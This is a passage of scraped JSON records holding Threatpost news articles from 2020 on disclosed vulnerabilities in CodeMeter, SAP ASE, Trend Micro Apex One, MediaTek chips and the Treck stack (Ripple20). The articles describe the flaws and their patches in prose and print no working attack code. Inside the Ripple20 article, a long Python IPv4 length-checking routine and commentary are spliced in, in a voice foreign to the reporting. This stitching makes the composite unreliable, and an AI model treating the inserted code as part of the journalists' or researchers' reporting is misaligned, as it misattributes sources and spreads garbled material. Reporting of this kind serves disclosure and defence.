"Six critical vulnerabilities have been discovered in a third-party software component powering various industrial systems. 
Remote, unauthenticated attackers can exploit the flaws to launch various malicious attacks \u2013 including deploying ransomware, and shutting down or even taking over critical systems.\n\nThe flaws exist in CodeMeter, owned by Wibu-Systems, which is a [software management component](<https://www.wibu.com/us/products/codemeter.html>) that\u2019s licensed by many of the top industrial control system (ICS) software vendors, including Rockwell Automation and Siemens. CodeMeter gives these companies tools to bolster security, help with licensing models, and protect against piracy or reverse-engineering.\n\nWibu-Systems made patches available for all of the flaws in version 7.10 of CodeMeter, on Aug. 11; however, the flaws were only recently disclosed by researchers on Tuesday. Many of the affected vendors have been notified and added \u2013 or are in the process of adding \u2013 fixes to their installers, said researchers with Claroty who discovered the glitches.\n\n\u201cSuccessful exploitation of these vulnerabilities could allow an attacker to alter and forge a license file, cause a denial-of-service condition, potentially attain remote code-execution, read heap data and prevent normal operation of third-party software dependent on the CodeMeter,\u201d according to a [Tuesday advisory](<https://us-cert.cisa.gov/ics/advisories/icsa-20-203-01>) published by ICS-CERT.\n\nResearchers discovered a set of flaws in the CodeMeter WebSocket API ([CVE-2020-14519](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14519>)) enabling management of licenses via JavaScript. 
To exploit the flaws, an attacker would first have to phish or socially-engineer victims to lure them to a site they control.\n\nIn one attack scenario, an attacker could target a specific group of engineers looking for advice on a forum dedicated to programmable logic controllers (PLCs), by hosting the malicious payload on a phony or compromised forum. Once the target visits the attacker-controlled website, the threat actors are able to use JavaScript to inject a malicious license of their own onto the target\u2019s machine, researchers said.\n\n\u201cThese flaws can be exploited via phishing campaigns or directly by attackers who would be able to fingerprint user environments in order to modify existing software licenses or inject malicious ones, causing devices and processes to crash,\u201d according to Sharon Brizinov and Tal Keren, security researchers with Claroty, [in a Tuesday analysis](<https://www.claroty.com/2020/09/08/blog-research-wibu-codemeter-vulnerabilities/>). \u201cSerious encryption implementation issues, also discovered by Claroty, can be exploited to allow attackers to execute code remotely, and move laterally on [operational technology] (OT) networks.\u201d\n\nAnother severe flaw ([CVE-2020-14509](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14509>)) is a simple buffer-access error, in the packet parser mechanism used by CodeMeter, which does not verify length fields. This flaw has the highest CVSS v3 score possible (10 out of 10), making it critical.\n\n\u201cCVE-2020-14509 is a highly critical vulnerability that poses a great risk to products that are using the third-party component, CodeMeter,\u201d Brizinov told Threatpost. \u201cThe vulnerability is a heap buffer overflow memory-corruption flaw, and it could be exploited to gain remote code execution without any prior knowledge of the target machine. 
All an attacker will need to do is be able to communicate with the target machine via TCP port 22350.\u201d\n\nAnother serious bug ([CVE-2020-14517](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14517>)) was found in the CodeMeter encryption implementation. This flaw could be leveraged to attack the CodeMeter communication protocol and internal API, in order to remotely communicate with, and send commands to, any machine running CodeMeter, researchers said.\n\nFigure: A breakdown of the CodeMeter WebSocket vulnerability. Credit: Claroty\n\nThe remaining three flaws include an improper input-validation error ([CVE-2020-14513](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14513>)) that could force CodeMeter to shut down; an issue in the license-file signature-checking mechanism ([CVE-2020-14515](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14515>)) that allows attackers to build arbitrary license files; and an improper-resource shutdown or release vulnerability ([CVE-2020-16233](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16233>)).\n\n\u201cChaining these\u2026 bugs allows an attacker to sign their own licenses and then inject them remotely,\u201d said researchers. \u201cVulnerabilities related to input-validation errors (CVE-2020-14513) could also be exploited to cause industrial gear to crash and be unresponsive, leading to a denial-of-service condition.\u201d\n\nAccording to ICS-CERT, Wibu-Systems recommends that users update to the latest version of the CodeMeter Runtime (version 7.10). 
Affected vendors like [Rockwell](<https://idp.rockwellautomation.com/adfs/ls/idpinitiatedsignon.aspx?RelayState=RPID%3Drockwellautomation.custhelp.com%26RelayState%3Danswers%2Fanswer_view%2Fa_id%2F1127863>) and [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>) have released their own security advisories, but researchers warn that, due to CodeMeter being integrated into many leading ICS products, users may be unaware this vulnerable third-party component is running in their environment.\n\n\u201cCodeMeter is a widely deployed third-party tool that is integrated into numerous products; organizations may not be aware their product has CodeMeter embedded, for example, or may not have a readily available update mechanism,\u201d warned researchers.\n\nBrizinov told Threatpost that researchers have not encountered any active campaigns using these exploits yet. Threatpost has reached out to Wibu-Systems for further comment.\n\nVulnerabilities in industrial gear have worried the security space due to the dire implications if a critical system is attacked. In July, the U.S. National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://threatpost.com/nsa-urgent-warning-industrial-cyberattacks-triconex/157723/>) warning that adversaries could be targeting critical infrastructure across the U.S.\n\nIn March, [security vulnerabilities](<https://threatpost.com/critical-bugs-in-rockwell-johnson-controls-ics-gear/153602/>) requiring very little skill to exploit were discovered in ICS devices from Rockwell Automation and Johnson Controls. And in July, researchers warned that [remote code-execution flaws](<https://threatpost.com/critical-bugs-utilities-vpns-physical-damage/157835/>) in virtual private network (VPN) products could impact the physical functioning of critical infrastructure in the oil and gas, water and electric utilities space.\n", "cvss3": {}, "published": "2020-09-09T15:58:16", "type": "threatpost", "title": "Critical Flaws in 3rd-Party Code Allow Takeover of Industrial Control Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-14509", "CVE-2020-14513", "CVE-2020-14515", "CVE-2020-14517", "CVE-2020-14519", "CVE-2020-16233", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-09-09T15:58:16", "id": "THREATPOST:2599160F787BE161604E8BC2847A6643", "href": "https://threatpost.com/severe-industrial-bugs-takeover-critical-systems/159068/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:18:58", "description": "Researchers are urging users to apply patches for several critical vulnerabilities in SAP\u2019s Adaptive Server Enterprise (ASE). 
If exploited, the most severe flaws could give unprivileged users complete control of databases and \u2013 in some cases \u2013 even underlying operating systems.\n\nASE (previously known as Sybase SQL server) is SAP\u2019s popular database management software, targeted for transactional-based applications. ASE is used by more than 30,000 organizations globally \u2013 including 90 percent of the top banks and security firms worldwide, [according to SAP](<https://news.sap.com/2019/11/sap-ase-sap-iq-next-generation/>).\n\nResearchers disclosed six vulnerabilities that they discovered while conducting security tests for the latest version of the software, ASE 16 (SP03 PL08). While SAP has released patches for both [ASE 15.7 and 16.0 in its May 2020 update,](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=545396222>) researchers disclosed technical details of the flaws on Wednesday, saying \u201cthere is no question\u201d that the patches should be applied immediately if they haven\u2019t been already.\n\n\u201cFor the last several years there have been relatively few security patches for SAP Adaptive Server Enterprise (ASE),\u201d said Trustwave researchers [in a Wednesday analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/system-takeover-through-new-sap-ase-vulnerabilities/>). \u201cNew security research conducted by Trustwave revealed a bunch of vulnerabilities in the current version of SAP\u2019s flagship relational database product. Historically, SAP ASE is widely used by the financial sector in the US and other countries.\u201d\n\nThe most severe vulnerability, [CVE-2020-6248](<https://www.google.com/search?client=safari&rls=en&q=CVE-2020-6248&ie=UTF-8&oe=UTF-8>), has a CVSS score of 9.1 out of 10. The flaw stems from a lack of security checks for overwriting critical configuration files during database backup operations. 
That means any unprivileged user who can run a DUMP command (used by database owners to back up the file system to storage devices) can send a corrupted configuration file, resulting in potential takeover of the database. This file will then be detected by the server and replaced with a default configuration \u2013 which allows anyone to connect to the Backup Server using the login and an empty password.\n\n\u201cThe next step would be to change the sybmultbuf_binary Backup Server setting to point to an executable of the attacker\u2019s choice,\u201d said researchers. \u201cSubsequent DUMP commands will now trigger the execution of the attacker\u2019s executable. If SAP ASE is running on Windows, the code will run as LocalSystem by default.\u201d\n\nAnother critical flaw ([CVE-2020-6252](<https://nvd.nist.gov/vuln/detail/CVE-2020-6252>)) was discovered affecting Windows installations of the SAP ASE 16. That bug exists in a small helper database (SQL Anywhere) used by the SAP ASE installation to manage database creation and version management. Specifically, the issue is in the Cockpit component of ASE, which is a web-based tool for monitoring the status and availability of SAP ASE servers. The issue stems from the password used to log in to the helper database being stored in a configuration file that is readable by any Windows user.\n\n\u201cThis means any valid Windows user can grab the file and recover the password to login to the helper SQL Anywhere database as the special user utility_db and then issue commands like CREATE ENCRYPTED FILE to overwrite operating system files (remember, the helper database runs as LocalSystem by default!) 
and possibly cause code execution with LocalSystem privileges,\u201d said researchers.\n\nIn another issue, researchers found clear text passwords in the ASE server installation logs: \u201cThe logs are only readable to the SAP account, but will completely compromise the SAP ASE when joined with some other issue that allows filesystem access,\u201d they said.\n\nResearchers also found two SQL injection flaws that could be abused to allow privilege escalation. One ([CVE-2020-6241](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6241>)) exists in global temporary tables in ASE 16, while the other ([CVE-2020-6253](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6253>)) stems from the WebServices handling code of ASE.\n\nThe final bug discovered was an XP Server flaw ([CVE-2020-6243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6243>)) that could allow authenticated Windows users to gain arbitrary code execution (as LocalSystem) if they can connect to the SAP ASE.\n\n\u201cOrganizations often store their most critical data in databases, which, in turn, are often necessarily exposed in untrusted or publicly exposed environments,\u201d said researchers. \u201cThis makes vulnerabilities like these essential to address and test quickly since they not only threaten the data in the database but potentially the full host that it is running on.\u201d\n", "cvss3": {}, "published": "2020-06-03T16:51:39", "type": "threatpost", "title": "Critical SAP ASE Flaws Allow Complete Control of Databases", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135", "CVE-2020-6241", "CVE-2020-6243", "CVE-2020-6248", "CVE-2020-6252", "CVE-2020-6253"], "modified": "2020-06-03T16:51:39", "id": "THREATPOST:60965118E4D29480FABA6D1722EFA4AA", "href": "https://threatpost.com/critical-sap-ase-flaws-complete-control-databases/156239/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-10-17T23:04:01", "description": "Trend Micro has released security updates patching five vulnerabilities in its endpoint security solutions, Apex One and OfficeScan XG for Windows.\n\nSpecifically, Apex One 2019 and OfficeScan XG SP1 and XG are affected by four critical-severity (and one high-severity) flaws. Two of these vulnerabilities are under active attack.\n\n\u201cTrend Micro has observed active attempts of potential attacks against \u2026 these vulnerabilities in the wild,\u201d the company said in its [Monday alert](<https://success.trendmicro.com/solution/000245571>). \u201cCustomers are strongly encouraged to update to the latest versions as soon as possible.\u201d\n\nThe first of two flaws under attack is a critical vulnerability (CVE-2020-8467) that exists in the migration tool component of Apex One and OfficeScan. The flaw could allow remote code execution on affected installations. While attackers could be remote, an attempted attack for this flaw requires authentication.\n\nThe second flaw actively targeted is a high-severity bug (CVE-2020-8468) in Apex One and OfficeScan. 
According to the advisory, the software\u2019s agents are \u201caffected by a content validation escape vulnerability which could allow an attacker to manipulate certain agent client components. An attempted attack requires user authentication.\u201d\n\n**Critical Flaws**\n\nThe advisory also pointed to three additional critical flaws. While attempted exploits in the wild have not been observed at this time for these flaws, they all rank 10 (out of 10) on the CVSS scale, indicating the highest level of severity.\n\nThe first (CVE-2020-8470) stems from the Apex One and OfficeScan server containing a vulnerable service DLL file, which could enable an unauthenticated attacker to delete any file on the server with SYSTEM level privileges.\n\nAnother (CVE-2020-8599) exists due to the server containing a vulnerable EXE file, which could allow a remote, unauthenticated attacker to write arbitrary data to an arbitrary path on affected installations and bypass ROOT login.\n\nAnd the final flaw (CVE-2020-8598) is due to the server containing a vulnerable service DLL file that could allow an unauthenticated, remote attacker to execute arbitrary code on affected installations with SYSTEM level privileges.\n\nThe advisory stressed that exploiting these vulnerabilities generally requires that an attacker has access (physical or remote) to a vulnerable machine. So beyond updating to the latest fixed versions (which are listed below), users \u201care encouraged to review and ensure the product servers and management consoles are restricted to trusted networks and/or users as appropriate.\u201d\n\nTrend Micro discovered all vulnerabilities in question.\n\nResearchers with Tenable noted in an analysis posted Tuesday that this isn\u2019t the first time attackers have singled out Trend Micro. 
\u201cIn October 2019, Trend Micro published a security bulletin for CVE-2019-18187, a directory traversal vulnerability in OfficeScan. According to their bulletin, they had observed active attempts to exploit the flaw in the wild,\u201d they [said.](<https://www.tenable.com/blog/cve-2020-8467-cve-2020-8468-vulnerabilities-in-trend-micro-apex-one-and-officescan-exploited-in>) \u201cCustomers running these products should be aware that attackers will continue to exploit these vulnerabilities and search for other, undiscovered vulnerabilities in these products.\u201d\n", "cvss3": {}, "published": "2020-03-18T18:00:39", "type": "threatpost", "title": "Trend Micro Fixes Critical Flaws Under Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-18187", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8470", "CVE-2020-8598", "CVE-2020-8599"], "modified": "2020-03-18T18:00:39", "id": "THREATPOST:FE1BBBDAB06CCA2534A051537BC5CC73", "href": "https://threatpost.com/trend-micro-fixes-critical-flaws-under-attack/153911/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:23:26", "description": "Google has addressed a high-severity flaw in MediaTek\u2019s Command Queue driver that developers said affects millions of devices \u2013 and which has an exploit already circulating in the wild.\n\nAlso in its March 2020 Android Security bulletin, [issued this week](<https://source.android.com/security/bulletin/2020-03-01>), Google disclosed and patched a critical security vulnerability in the Android media framework, which could enable remote code execution within the context of a privileged process.\n\nThe critical bug (CVE-2020-0032) can be exploited with a specially crafted file, according to the advisory. Other details were scant, but Google noted that it\u2019s the most concerning vulnerability out of the entirety of the March update.\n\nThe MediaTek bug meanwhile is an elevation-of-privilege flaw (CVE-2020-0069) discovered by members of XDA-Developers (a forum for Android software modifications) \u2014 they said the bug is more specifically a root-access issue. 
Even though the March update is the bug\u2019s first public disclosure, XDA members said [in a posting this week](<https://www.xda-developers.com/mediatek-su-rootkit-exploit/>) that an exploit for it has been floating around since April last year. And, they said that it is now being actively used by cybercriminals in campaigns.\n\n\u201cDespite MediaTek making a patch available a month after discovery, the vulnerability is still exploitable on dozens of device models,\u201d according to the alert. \u201cNow MediaTek has turned to Google to close this patch gap and secure millions of devices against this critical security exploit.\u201d\n\nAn XDA community member who goes by \u201cdiplomatic\u201d was looking to gain root access to Amazon Fire tablets, which run on the Android OS, in order to get rid of what developers said is \u201cuninstallable bloatware\u201d on the devices. Amazon has locked the environment down to keep users within its walled garden, according to the developers.\n\n\u201cThe only way to root an Amazon Fire tablet (without hardware modifications) is to find an exploit in the software that allows the user to bypass Android\u2019s security model,\u201d according to the post. \u201cIn February of 2019, that\u2019s exactly what XDA Senior Member diplomatic did when he published a thread on our Amazon Fire tablet forums. He quickly realized that this exploit was far wider in scope than just Amazon\u2019s Fire tablets.\u201d\n\nIn fact, the exploit works on \u201cvirtually all of MediaTek\u2019s 64-bit chips,\u201d developers said, translating to millions of devices.\n\ndiplomatic\u2019s exploit is a script, dubbed \u201cMediaTek-su,\u201d that grants users superuser access in a shell. 
It also sets SELinux (the Linux kernel module that provides access control for processes) to the \u201chighly insecure \u2018permissive\u2019 state,\u201d according to the post.\n\n\u201cFor a user to get root access and set SELinux to permissive on their own device is shockingly easy to do: All you have to do is copy the script to a temporary folder, change directories to where the script is stored, add executable permissions to the script, and then execute the script,\u201d XDA members explained.\n\nAfter discovering the script and how dangerous it can be in February, the forum notified Google of the bug, members said. XDA noted that in January, Trend Micro [found three malicious spyware apps](<https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/>) in the Google Play Store, linked to the APT known as SideWinder. The analysis mentions in passing that the apps were using MediaTek-su to gain root access on Pixel devices \u2013 though XDA pointed out that researchers there likely didn\u2019t realize that MediaTek-su was an unpatched exploit and didn\u2019t think to notify vendors.\n\nThe consequences of a successful attack can be significant: With root access, any app can grant itself any permission it wants; and with a root shell, all files on the device, even those stored in private data directories of applications, are accessible.\n\n\u201cAn app with root can also silently install any other app it wants in the background and then grant them whatever permissions they need to violate your privacy,\u201d according to XDA members. 
\u201cAccording to XDA Recognized Developer topjohnwu, a malicious app can even \u2018inject code directly into Zygote by using ptrace,\u2019 which means a normal app on your device could be hijacked to do the bidding of the attacker.\u201d\n\nIn its March Android update, Google also patched a slew of other high-severity bugs and a handful of moderate flaws, across various components. In the media framework, Google addressed a high-severity elevation-of-privilege bug (CVE-2020-0033) and a high-severity information-disclosure issue (CVE-2020-0034) for instance. Other components with patches include the Android system, the Android framework, the Google Play system, the kernel and flexible printed circuits (FPC). It also issued advisories for high-severity bugs in third-party components, including from Qualcomm and the aforementioned MediaTek bug.\n\nAndroid partners and OEMs were notified of the issues at least a month before publication of the March update in order to give them time to issue patches, as [Samsung has done](<https://security.samsungmobile.com/securityUpdate.smsb>) as well as [Qualcomm](<https://www.qualcomm.com/company/product-security/bulletins/march-2020-bulletin>). 
Source code patches for the issues were also released to the Android Open Source Project (AOSP) repository, according to the advisory. While the patch is now available, XDA members pointed out that MediaTek chipsets are found in dozens of budget and mid-tier Android devices from many different vendors, so the patching process is likely to take a while.\n", "cvss3": {}, "published": "2020-03-03T19:02:22", "type": "threatpost", "title": "MediaTek Bug Actively Exploited, Affects Millions of Android Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2215", "CVE-2020-0032", "CVE-2020-0033", "CVE-2020-0034", "CVE-2020-0069", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-03-03T19:02:22", "id": "THREATPOST:C7B22E2E8B3AB6D2FD4DA4F6C33951CF", "href": "https://threatpost.com/mediatek-bug-actively-exploited-android/153408/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:18:16", "description": "A series of 19 different vulnerabilities, four of them critical, are affecting hundreds of millions of internet of things (IoT) and industrial-control devices.\n\nThe issue is based in the supply chain and code reuse, with the bugs affecting a TCP/IP software library developed by Treck that many manufacturers use. Researchers at JSOF uncovered the faulty part of Treck\u2019s code, which is built to handle the ubiquitous TCP-IP protocol that connects devices to networks and the internet, in the devices of more than 10 different manufacturers\u2014and it\u2019s likely present in dozens more.\n\nAffected hardware includes everything from connected printers to medical infusion pumps and industrial-control gear, according to researchers at JSOF\u2019s research lab. 
Treck users include \u201cone-person boutique shops to Fortune 500 multinational corporations, including HP, Schneider Electric, Intel, Rockwell Automation, Caterpillar, Baxter, as well as many other major international vendors suspected of being vulnerable in medical, transportation, industrial control, enterprise, energy (oil/gas), telecom, retail and commerce, and other industries,\u201d according to the research.\n\n\u201cThe wide-spread dissemination of the software library (and its internal vulnerabilities) was a natural consequence of the supply chain \u2018ripple-effect,'\u201d researchers said [in a posting](<https://www.jsof-tech.com/ripple20/#ripple-whitepaper>) on Tuesday. \u201cA single vulnerable component, though it may be relatively small in and of itself, can ripple outward to impact a wide range of industries, applications, companies and people.\u201d\n\nThe flaws, dubbed Ripple20, include four remote code-execution vulnerabilities. If properly exploited, data could be stolen off of a printer, a medical device\u2019s behavior could be tampered with, or industrial control devices could be made to malfunction.\n\n\u201cAn attacker could hide malicious code within embedded devices for years. One of the vulnerabilities could enable entry from outside into the network boundaries; and this is only a small taste of the potential risks,\u201d according to JSOF.\n\n## **Vulnerability Details**\n\nThe Ripple20 bugs include four critical flaws. These include CVE-2020-11896, with a base score of 10 out of 10 on the CVSS severity scale, which can be triggered by sending multiple malformed IPv4 packets to a device supporting IPv4 tunneling.\n\n\u201cIt affects any device running Treck with a specific configuration,\u201d according to JSOF. \u201cIt can allow a stable remote code execution and has been demonstrated on a Digi International device. 
Variants of this issue can be triggered to cause a Denial of Service or a persistent Denial of Service, requiring a hard reset.\u201d\n\nThe critical bug tracked as CVE-2020-11897 meanwhile also carried a 10-out-of-10 severity, and is an out-of-bounds write flaw that can be triggered by sending multiple malformed IPv6 packets to a device. It affects any device running an older version of Treck with IPv6 support, and was previously fixed in a routine code change. It can potentially allow stable remote code execution, according to the writeup.\n\nAnother critical bug, CVE-2020-11901, ranks 9 out of 10 on the severity scale and can be triggered by answering a single DNS request made from the device. It can allow an attacker to infiltrate the network, execute code and take over the device with one vulnerability, bypassing any security measures.\n\n\u201cIt affects any device running Treck with DNS support and we have demonstrated that it can be used to perform remote code execution on a Schneider Electric APC UPS,\u201d according to JSOF. \u201cIn our opinion this is the most severe of the vulnerabilities despite having a CVSS score of 9, due to the fact that DNS requests may leave the network in which the device is located, and a sophisticated attacker may be able to use this vulnerability to take over a device from outside the network through DNS cache poisoning, or other methods.\u201d\n\nThe last critical bug is CVE-2020-11898, rating 9.1, which is an improper handling of length parameter inconsistency bug in the IPv4/ICMPv4 component, when handling a packet sent by an unauthorized network attacker. 
It can allow information disclosure.\n\nOther flaws range from high-severity 8.2 bugs (such as CVE-2020-11900, a use-after-free flaw) to low-severity improper input validation issues (such as CVE-2020-11913, rating only 3.7 in severity).\n\n\u201cThe other 15 vulnerabilities are in ranging degrees of severity with CVSS score ranging from 3.1 to 8.2, and effects ranging from denial of service to potential remote code execution,\u201d the firm said. \u201cMost of the vulnerabilities are true zero-days, with four of them having been closed over the years as part of routine code changes, but remained open in some of the affected devices (three lower severity, one higher). Many of the vulnerabilities have several variants due to the Stack configurability and code changes over the years.\u201d\n\nEffective exploitation can lead to a host of bad outcomes, the research firm warned, such as remote takeover of devices and lateral movement within the compromised network; broadcast attacks that can take over all impacted devices in the network simultaneously; hiding within an infected device for stealthy reconnaissance; and bypassing network address translation (NAT) protections.\n\nJSOF will offer further details of the vulnerabilities [at the Black Hat USA virtual event](<https://threatpost.com/black-hat-usa-def-con-28-go-virtual/155606/>) in August.\n\nJonathan Knudsen, senior security strategist at Synopsys, noted that the Ripple20 disclosures illustrate endemic difficulties in software development.\n\n\u201cFirst, security must be integrated to every part of software development: From threat modeling during design to automated security testing during implementation, every phase of software development must involve security,\u201d he said via email. \u201cSecond, organizations that create software must manage their third-party components. 
The main reason for the far-reaching effects of the Ripple20 vulnerabilities is that they are vulnerabilities in a network component used by many organizations in many products. Each software development organization must understand the third-party components they are using to minimize the risk that they represent.\u201d\n\n## **Patches and Mitigation**\n\nTreck has issued a patch for use by OEMs in the latest Treck stack version (6.0.1.67 or higher). The challenge now is for those companies to implement it. In addition to advisories from ICS CERT, CERTCC and JPCERT/CC, [Intel](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00295.html>) and [HP](<https://support.hp.com/in-en/document/c06640149>) have also issued alerts.\n\n\u201cWhile the best response might be to install the original Treck patch, there are many situations in which installing the original patch is not possible,\u201d according to the JSOF analysis. \u201cCERTs work to develop alternative approaches that can be used to minimize or effectively eliminate the risk, even if patching is not an option.\u201d\n\nBecause it\u2019s a supply-chain issue, affected products should be able to update themselves, Knudsen added \u2013 something that\u2019s not always the norm in the IoT and industrial-control sectors.\n\n\u201cUsing secure development practices and managing third-party components will result in fewer, less frequent updates,\u201d he explained. \u201cNevertheless, something will always go wrong and updates will always be necessary. Systems and devices must be able to update themselves securely, and the manufacturer must make a commitment to maintaining the software for some clearly stated time period.\u201d\n\nBased on CERT/CC and CISA ICS-CERT advisories, if gear can\u2019t be patched, admins should minimize network exposure for embedded and critical devices, ensuring that devices are not accessible from the Internet unless absolutely essential. 
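The two critical IPv4 bugs described above are both length-handling errors: CVE-2020-11896 is triggered by malformed packets sent to a device that accepts IPv4 tunneling, and CVE-2020-11898 is a length-parameter inconsistency in the IPv4/ICMPv4 code. The Python below is an added example, not Treck's or JSOF's code, and it does not reproduce the Ripple20 trigger. It is the consistency check a stack, or an inline filter placed in front of gear that cannot be patched, should apply before trusting any IPv4 length field: IHL against the fixed header and the buffer, total length against IHL and the bytes actually received, and the same checks repeated on an IPv4-in-IPv4 (protocol 4) payload, since with tunneling the inner header is also attacker-supplied. The packets are constructed inline for the example.

```python
import struct

IPPROTO_IPIP = 4             # IPv4-in-IPv4 encapsulation, i.e. "IPv4 tunneling"
HDR_FMT = "!BBHHHBBH4s4s"    # the 20-byte fixed part of an IPv4 header
HDR_LEN = struct.calcsize(HDR_FMT)


def build_ipv4(payload, proto, total_len=None, ihl_words=5):
    """Assemble a minimal IPv4 packet (checksum left zero; irrelevant here).

    total_len and ihl_words default to consistent values; pass wrong ones to
    build a malformed packet. Everything built with this function is
    constructed sample data for the example, not captured traffic.
    """
    options = b"\x00" * 4 * max(ihl_words - 5, 0)
    if total_len is None:
        total_len = HDR_LEN + len(options) + len(payload)
    ver_ihl = (4 << 4) | (ihl_words & 0x0F)
    header = struct.pack(HDR_FMT, ver_ihl, 0, total_len, 0x1234, 0, 64,
                         proto, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return header + options + payload


def check_ipv4(buf, depth=0, max_depth=2):
    """Return a list of findings; an empty list means the lengths agree.

    The checks run in the order a parser must apply them, each one before the
    field it covers is used as an offset or a copy length: the header length
    (IHL) has to cover the fixed header and fit in the buffer, then the total
    length has to cover the header and not exceed the bytes actually received.
    With protocol 4 the payload is another IPv4 header chosen by the sender,
    so the same checks are repeated on it, with a cap on nesting depth.
    """
    tag = f"depth {depth}"
    if len(buf) < HDR_LEN:
        return [f"{tag}: {len(buf)} bytes received, shorter than a {HDR_LEN}-byte header"]
    fields = struct.unpack(HDR_FMT, buf[:HDR_LEN])
    ver_ihl, total_len, proto = fields[0], fields[2], fields[6]
    version, ihl_bytes = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    if version != 4:
        return [f"{tag}: version {version} is not IPv4"]
    if ihl_bytes < HDR_LEN:
        return [f"{tag}: IHL claims a {ihl_bytes}-byte header, below the {HDR_LEN}-byte minimum"]
    if ihl_bytes > len(buf):
        return [f"{tag}: IHL claims a {ihl_bytes}-byte header but only {len(buf)} bytes received"]
    findings = []
    if total_len < ihl_bytes:
        findings.append(f"{tag}: total length {total_len} is smaller than the {ihl_bytes}-byte header")
    if total_len > len(buf):
        findings.append(f"{tag}: total length {total_len} exceeds the {len(buf)} bytes received")
    if findings:
        return findings
    if proto == IPPROTO_IPIP:
        if depth + 1 >= max_depth:
            return [f"{tag}: IPv4-in-IPv4 nested beyond {max_depth} levels"]
        # Only the bytes the outer header vouches for are handed down.
        return check_ipv4(buf[ihl_bytes:total_len], depth + 1, max_depth)
    return []


# Constructed samples: one consistent tunnel and several that lie about a length.
INNER = build_ipv4(b"hello", proto=17)                       # 25-byte inner datagram
GOOD_TUNNEL = build_ipv4(INNER, proto=IPPROTO_IPIP)          # outer and inner agree
OVERSIZED_INNER = build_ipv4(b"hello", proto=17, total_len=1500)
BAD_INNER_LEN = build_ipv4(OVERSIZED_INNER, proto=IPPROTO_IPIP)  # inner claims 1500 bytes
BAD_IHL = build_ipv4(b"x", proto=17, ihl_words=3)            # a 12-byte header is impossible
BAD_OUTER_LEN = build_ipv4(b"x", proto=17, total_len=200)    # claims more bytes than sent
TRIPLE_TUNNEL = build_ipv4(build_ipv4(INNER, proto=IPPROTO_IPIP), proto=IPPROTO_IPIP)

if __name__ == "__main__":
    for name, pkt in [("GOOD_TUNNEL", GOOD_TUNNEL), ("BAD_INNER_LEN", BAD_INNER_LEN),
                      ("BAD_IHL", BAD_IHL), ("BAD_OUTER_LEN", BAD_OUTER_LEN),
                      ("TRIPLE_TUNNEL", TRIPLE_TUNNEL), ("TRUNCATED", GOOD_TUNNEL[:30])]:
        print(name, check_ipv4(pkt) or "ok")
```

In a stack of this kind the checks belong at the top of the IPv4 receive path; at an inspection point the same logic decides whether a packet is forwarded. The cap on tunnel nesting matters as much as the length checks: without it, a chain of protocol-4 headers is a cheap way to keep the parser recursing on attacker-supplied bytes.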
Also, operational technology networks and devices should be segregated behind firewalls and isolated from any business networks.\n\nUsers can also take steps to block anomalous IP traffic, employ pre-emptive traffic filtering, normalize DNS through a secure recursive server or DNS inspection firewall and/or provide DHCP/DHCPv6 security, with features such as DHCP snooping, according to the CERTs.\n\n\u201cThe software library spread far and wide, to the point that tracking it down has been a major challenge,\u201d the researchers concluded. \u201cAs we traced through the distribution trail of Treck\u2019s TCP/IP library, we discovered that over the past two decades this basic piece of networking software has been spreading around the world, through both direct and indirect use. As a dissemination vector, the complex supply chain provides the perfect channel, making it possible for the original vulnerability to infiltrate and camouflage itself almost endlessly.\u201d\n", "cvss3": {}, "published": "2020-06-16T16:22:09", "type": "threatpost", "title": "'Ripple20' Bugs Impact Hundreds of Millions of Connected Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11896", "CVE-2020-11897", "CVE-2020-11898", "CVE-2020-11900", "CVE-2020-11901", "CVE-2020-11913", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-06-16T16:22:09", "id": "THREATPOST:659B01C0432DD93535B729D005CCA9E8", "href": "https://threatpost.com/millions-connected-devices-ripple20-bugs/156599/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:22:01", "description": "A security researcher has disclosed vulnerabilities in Apple\u2019s Safari browser that can be used to snoop on iPhones, iPads and Mac computers through their microphones and cameras. To exploit the flaws in a real-world attack, all an attacker would need to do is convince a victim to click one malicious link.\n\n[Security researcher Ryan Pickren](<https://www.ryanpickren.com>) has revealed details on seven flaws in Safari, including three that could be chained together to access victims\u2019 webcams. The vulnerabilities were previously submitted to Apple via its 